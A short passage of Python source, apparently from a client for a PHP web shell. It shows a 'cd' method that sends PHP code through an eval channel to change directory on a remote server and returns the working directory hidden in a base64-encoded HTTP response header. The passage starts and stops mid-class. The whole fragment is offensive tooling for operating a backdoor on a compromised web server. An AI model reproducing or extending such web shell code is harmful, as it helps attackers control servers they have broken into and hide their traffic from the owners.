(self, options: str)
| 157 | @brief See base class for details. |
| 158 | """ |
| 159 | def _Base__cd(self, options: str): |
| 160 | out = self.__eval(f"chdir('{options}');" |
| 161 | f"header('{self.header}: ' . " |
| 162 | f"base64_encode(getcwd()));") |
| 163 | self.directory = base64.b64decode(out).decode() |
| 164 | print(self.directory) |
| 165 | |
| 166 | """ |
| 167 | @brief See base class for details. |